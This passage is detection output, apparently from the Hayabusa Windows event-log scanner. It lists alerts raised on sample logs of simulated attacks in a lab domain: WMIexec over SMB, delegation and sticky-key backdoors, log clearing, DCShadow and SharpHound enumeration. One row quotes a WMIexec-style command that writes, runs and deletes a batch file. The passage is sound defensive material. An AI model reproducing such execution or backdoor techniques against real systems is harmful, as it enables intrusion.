(GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : 
File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: 
\\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos 
only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC 
Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
